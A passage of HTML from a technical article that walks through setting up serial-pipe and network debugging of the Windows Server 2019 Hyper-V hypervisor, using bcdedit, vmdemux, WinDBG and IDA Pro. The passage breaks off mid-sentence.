font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /set bootdebug on </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(needed to study process of hypervisor loading in next part of the article)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Standard debugging extensions is:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdcom.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdhvcom.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kd1934.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdhv1394.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdusb.dll</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kdnet.dll (with many of network card’s vendor modules)</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Kd.dll</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We use kdhvcom.dll in our case.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 184px; overflow: hidden; width: 312px;"><img height="184" src="https://lh6.googleusercontent.com/14D-UaH6llQ_y_zAyu0dQVeUdTzrOzxOmzIkW8X0Z0KSJqj16TfJp2eUvHuyXcWg6ciUgNiwnQotOBXhV9D9s8JIbcB-eBnG7kZbxjK-fTR2S7WLiQRJ3QvfPHODXA8CNGkd1APnXtfUIM_hcQ" style="margin-left: 0px; margin-top: 0px;" width="312" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Restart</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Windows Server 2019. OS will stop in waiting for debugger connection.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="background-color: transparent; color: black; font-family: 'Times New Roman'; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Open</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HHD software Free Virtual Serial Ports, select </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">File, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> Create Pipe Port</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. In the field of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Pipe name </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">specify the same value for a virtual machine - </span><a href="about:blank" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #954f72; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">\\.\pipe\com_1</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Create pipe</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> option must be empty (for listening pipe, not creation)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Press </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">OK.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 212px; overflow: hidden; width: 203px;"><img height="212" src="https://lh6.googleusercontent.com/5aLKQt6v4pHz_bHpO-P4HEXeS5HeCNelrsbvGivmpYtA9t-0bVgoqizzYz-DJR73EcsNIM5n6drFIl2VXaVxXf1Z5jtPd0VFbrXfJRR_nbVvmKB7-ry1RhKixTMS05bDtVQ90m2X7Ynxy89qug" style="margin-left: 0px; margin-top: 0px;" width="203" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Do this after VM will be launched, or you can see error, that pipe is not presented (VMware creates it, if VM was launched)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 70px; overflow: hidden; width: 369px;"><img height="70" src="https://lh5.googleusercontent.com/dFZ_zBxRdkWcMRiLZmw1O9oOcsNEJxmdc4qk-0WVfstEhD5BYuCloLYkAYxixidHFDQD3iI_Y-9O1IagKUvAvV5_YgXITL1N9yq9VRrwYuH-LrY7umt4x7yNOkuM9CpjdHPGJ18FcwGxl1HmNQ" style="margin-left: 0px; margin-top: 0px;" width="369" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Run </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(located in WinDBG x64 directory), specifying the name of the port as one of the parameters:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmdemux.exe -src com:port=com2,baud=115200</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Command creates two named pipes: </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Vm0</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for hypervisor and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Vm1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> for root-partition</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 103px; overflow: hidden; width: 466px;"><img height="103" src="https://lh6.googleusercontent.com/bLgV4qWpdslLnn9lv5rqgw_QE2jliq0yEGDYerjvAbbdJOhpS08C9CppprhWArTmr_i4leaRbGl4WUBM-YdAv3uNFokAX7kNA535yGYndw3tuQx39_Y1_yZT46UByhFhZ6QXrCFvwvc7S6aezQ" style="margin-left: 0px; margin-top: 0px;" width="466" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">6.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can attach WinDBG Preview to every pipe for testing:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBGx.exe -k com:port=\\.\pipe\Vm1,pipe,reconnect,resets=0 – root partition</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 165px; overflow: hidden; width: 538px;"><img height="165" src="https://lh3.googleusercontent.com/RHIOLbLR3n6MrC53X8QJmPBVcU5SigbwWzb9FhXDDYziz96avDgPaWgJH_x03qeyph8Qwcs62TxoXR4k6uDCokaiSWB9BJ9F3gAoDjjXDSD9Zt9HJHWQN8-UIgZgsNPbyXLJ8josJgNUOfgFTQ" style="margin-left: 0px; margin-top: 0px;" width="538" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBGx.exe -k com:port=\\.\pipe\Vm0,pipe,reconnect,resets=0 – hypervisor</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 151px; overflow: hidden; width: 571px;"><img height="151" src="https://lh4.googleusercontent.com/c76GSaXsBYM1mbZE50A5jmnlOqV9lQl8WD3nAYfSvF9NQ369_i7fYiNfkv9fKncO5eu82iQpIDw_ei5izr-97T8k9nNy0Jqzl8rwV95XOILgCGGfp6wp0mTFgXmdnR74lPnFxcVpDMYMGLKj5Q" style="margin-left: 0px; margin-top: 0px;" width="571" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">7.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After that, using IDA PRO, you can connect directly to the hypervisor through named pipe \\.\Pipe\Vm0, choosing WinDBG debugger and specifying process options in the connection string: </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">com:port=\\.\pipe\Vm0,pipe,resets=0</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">8.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If following message appears, choose </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Same</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 338px;"><img height="135" src="https://lh5.googleusercontent.com/d0Ri0TBWhZfo9YU9iX5olnAb_zTqsNpVIJHWCGKZDkfTYZM1BCZD2tD3niqe8cEfDXxiCBJzw_4EN0CM49I7vl1Ks7HyO__AHkJFA9b9ARs99Hp3dhD6GS5Jc1fAkdpG32diZeWuop5i2oDf3w" style="margin-left: 0px; margin-top: 0px;" width="338" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">9.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The debugger will stop within hypervisor:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 177px; overflow: hidden; width: 353px;"><img height="177" src="https://lh5.googleusercontent.com/xOfjM-V1HRIMQQuxtGmxGNlKD0zSHDJ5QkwNQuZI0Vzu1oHdZyYhqp3PUEvMdnfLdJJb6Dx5Z1xIbDTd3lGmDxr7k76JWZqyBthEU4lo93lRNjMQQNdXtYnDvHBJzUnhoNJDG7X43Y2jyHT0eQ" style="margin-left: 0px; margin-top: 0px;" width="353" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As we see in comparing with Windows Server 2012 (R2) there is new module – kdstub.dll. Early versions of hypervisor have static link with debug library and large file size (2-3Mb), size of current version of hvix64.exe (10.0.17763.1577) – 1 230 KB.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For network debugging kdstub.dll will be changed on appropriate debug module, f.e. kd_02_8086.dll:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 109px; overflow: hidden; width: 339px;"><img height="109" src="https://lh3.googleusercontent.com/lwmwbL8QS9z9Zy2M9wj4Osp-iVuwkRd3ODlh1gYr1H2Xxza9wMJxWljssARuIfwDRU20C-KwVzlDjcLEV_mj0ft9Fp_G5C59ne_vk1oIXzbXt6d89cdKEQNCJwZ3WKNALZSIppHYXSsLCIXwTA" style="margin-left: 0px; margin-top: 0px;" width="339" /></span></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">How configure COM-debugging Hyper-V inside Hyper-V VM you can read at article, written by Saar Amar (@AmarSaar):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><a href="https://msrc-blog.microsoft.com/2018/12/10/first-steps-in-hyper-v-research/" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://msrc-blog.microsoft.com/2018/12/10/first-steps-in-hyper-v-research/</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><h2 dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 18pt; margin-top: 2pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Network debugging</span></h2><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is opportunity to debug hypervisor over network in Windows Server 2012 and higher:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Enabling debugging and specify port (different for root and hypervisor)</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /debug yes</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Bcdedit /dbgsettings net hostip:192.168.2.1 port:50002</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in response, the command will display the connection string of the root-partition</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /set hypervisordebug on</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /hypervisorsettings NET HOSTIP:192.168.2.1 PORT:50000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in response, the command will display the connection string of the 